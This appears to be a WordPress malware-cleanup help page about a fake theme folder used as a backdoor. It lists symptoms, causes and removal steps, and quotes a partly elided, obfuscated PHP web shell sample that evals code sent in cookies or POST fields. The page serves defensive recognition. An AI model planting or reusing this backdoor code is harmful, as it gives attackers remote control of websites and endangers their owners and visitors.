Fake or Unknown WordPress theme in wp-content/themes folder

If you find a unknown or nulled theme in your WordPress website, it might indicate that your site is infected with WordPress malware. Such malware gives the hacker complete access to your WordPress site through backdoors

Symptoms

• There are unknown files or folders at wp-content/themes
• Your website visitors are being redirected to spammy websites with viruses
• Your site gets infected with malware even after you have deleted the bad files

Location of the fake theme in WordPress Site

• /wp-content/themes/gyjjcrxedo/

<?php ${"\x47L\x4f\x42\x41\x4c\x53"}["m\x79\x70\x61c\x63\x73\x76"]="\x5f1";${"\x47\x4cOBAL\x53"}["h\x6fq\x70\x75\x73p\x67l\x73v"]="\x5f\x30";$GLOBALS["\x5f1\x371515\x319\x31_"]=Array("str\x5f"."ro\x741\x33","\x70\x61\x63\x6b","\x73\x74"."r\x72\x65\x76");function _1178619035($i){$rymhgnsq="\x61";$ijkxdjo="a";$ibnyrutvve="\x69";${$rymhgnsq}=Array("jwe\x79c","aesko\x6cy","\x6fwhg\x67i\x6b\x75","c\x61l\x6c\x62r\x68y","H*");return${$ijkxdjo}[${$ibnyrutvve}];}function l__0($_0){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6d\x6f\x67\x75x\x69\x72\x70\x69"]="\x5f\x30";return isset($_COOKIE[${${"GLO\x42\x41\x4c\x53"}["\x68oq\x70\x75s\x70\x67\x6c\x73\x76"]}])?$_COOKIE[${${"G\x4c\x4fB\x41\x4c\x53"}["\x6do\x67u\x78i\x72\x70i"]}]:@$_POST[${${"\x47\x4c\x4f\x42\x41\x4c\x53"}
[...]
["m\x79\x70\x61c\x63s\x76"]}=l__0(_1178619035(0)).l__0(_1178619035(1)).l__0(_1178619035(2)).l__0(_1178619035(3));if(!empty(${${"\x47L\x4fBA\x4c\x53"}["\x6d\x79p\x61\x63\x63s\x76"]})){${${"\x47L\x4fB\x41\x4c\x53"}["\x6d\x79\x70acc\x73\x76"]}=$GLOBALS["_\x317\x315\x31\x35\x3191\x5f"][0](@$GLOBALS["_\x31715\x3151\x391\x5f"][1](_1178619035(4),$GLOBALS["_\x3171\x3515\x319\x31\x5f"][2](${${"\x47\x4c\x4f\x42AL\x53"}["m\x79\x70\x61\x63c\x73\x76"]})));if(isset(${${"\x47\x4c\x4f\x42AL\x53"}["\x6d\x79\x70\x61\x63\x63s\x76"]})){@eval(${${"G\x4c\x4f\x42\x41L\x53"}["\x6d\x79pac\x63s\x76"]});exit();}}
?>

Cause of the hack - Fake WP theme in wp-content/themes folder

• WordPress core or plugins are not updated
• You have multiple websites on the same server, which are causing cross-site infection
• Vulnerabilities in the theme or plugins

Steps to Fix

• You can delete the fake theme folder from your WordPress site after taking a backup
• Search your server for other viruses by running a malware scan - as it is likely that a hacker would have placed more backdoors
• Check for any fake WordPress plugins that may be installed on the site (wp-content/plugins folder)
• Update your WordPress code version, plugins, themes
• Install a Web Application Firewall to prevent such hacks

Need professional help to fix hacked WordPress? Drop us a message on the chat widget and we’d be happy to help you. Fix my WordPress website now.